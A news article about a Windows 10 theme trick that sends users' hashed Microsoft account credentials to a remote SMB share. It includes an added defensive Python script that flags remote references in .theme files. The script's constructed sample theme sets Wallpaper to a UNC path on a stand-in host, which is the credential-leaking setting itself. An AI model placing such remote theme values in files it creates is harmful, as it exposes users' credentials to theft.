Changing your Windows theme seems innocent enough, and it's nice to freshen things up sometimes. But you may want to be careful about which sources you use to get new themes. A security researcher has shown a way to change Windows 10 themes to steal your Microsoft password.
As discovered by Bleeping Computer, security researcher Jimmy Bayne (@bohops) shows that the process is not even difficult. It uses several Windows behaviors to execute a “Pass-the-Hash” attack.
In a “Pass-the-Hash” attack, bad actors do not bother getting your password in plain text. They set up an attack that sends them your hashed password. They can then submit that hash for authentication to Microsoft (or whichever company the account belongs to), and because it matches, it works just as well as the plaintext password.
[Credential Harvesting Trick] Using a Windows theme file, the background key can be configured to point to a remote http / s resource. When a user activates the theme file (for example, opens from a link / attachment), a user cred prompt is displayed to the user 1/4 pic.twitter.com/rgR3a9KP6Q
– bohops (@bohops) 5 September 2020
As Bayne explains, hackers can change a Windows theme to force the operating system to connect to a remote SMB share that requires authentication. When Windows connects to a remote SMB share, it automatically sends your account credentials (your username and hashed password) to log in.
Microsoft moved to online accounts with Windows 10, and it’s slowly driving everyone to use them. If you are already using your Microsoft account, this means that your Microsoft username and hashed password will be sent to the hacker.
Once the hacker has modified a theme, they can save it and upload it to websites that host Windows themes. You will not know what hit you until it is too late. Bayne reported the problem to Microsoft, but the company declined to create a fix because the behavior is a “by design” feature.
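As an added defensive check (not code from Bayne or the article), the script below parses a Windows .theme file, which is an INI-style text file, and flags any value that points at a remote host, the kind of entry the trick above depends on. It assumes the standard .theme layout (a `[Control Panel\Desktop]` section with a `Wallpaper=` entry); the two sample themes are constructed, and the UNC host is a documentation address.

```python
"""Flag values in a Windows .theme file that reference a remote resource.
Added example; the sample theme text below is constructed."""
import configparser
import re
from typing import List, Tuple

# Matches a UNC path (\\host\share\...) or an http(s)/file URL to a host.
REMOTE_REF = re.compile(r"(?i)(?:^\\\\[^\\]+\\|^(?:https?|file)://)")


def find_remote_refs(theme_text: str) -> List[Tuple[str, str, str]]:
    """Return (section, key, value) triples whose value points off-host.

    Every value in every section is checked, so remote slideshow or
    icon paths are caught as well as the Wallpaper entry.
    """
    # interpolation=None: theme values contain '%SystemRoot%'-style text.
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    parser.optionxform = str  # keep key names as written, e.g. "Wallpaper"
    parser.read_string(theme_text)
    hits = []
    for section in parser.sections():
        for key, value in parser.items(section):
            value = value.strip()
            if REMOTE_REF.search(value):
                hits.append((section, key, value))
    return hits


# Constructed sample: a local wallpaper, as a normal theme would use.
BENIGN_THEME = """\
[Theme]
DisplayName=Blue

[Control Panel\\Desktop]
Wallpaper=%SystemRoot%\\web\\wallpaper\\Windows\\img0.jpg
"""

# Constructed sample: the wallpaper lives on a remote SMB share.
REMOTE_THEME = """\
[Theme]
DisplayName=Free Wallpaper Pack

[Control Panel\\Desktop]
Wallpaper=\\\\192.0.2.10\\share\\bg.jpg
"""

if __name__ == "__main__":
    for name, text in (("benign", BENIGN_THEME), ("remote", REMOTE_THEME)):
        print(name, find_remote_refs(text))
```

Run it against a downloaded theme before applying it; an empty list means no value in the file points at a remote host.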
Bayne suggested some mitigations, but they amount to breaking Windows' theme handling.
Once you have done that, you cannot change themes (until you undo the change). The safest thing you can do is enable two-step verification. If someone steals your password, they still do not have everything they need to get into your account.
Source: Jimmy Bayne via Bleeping Computer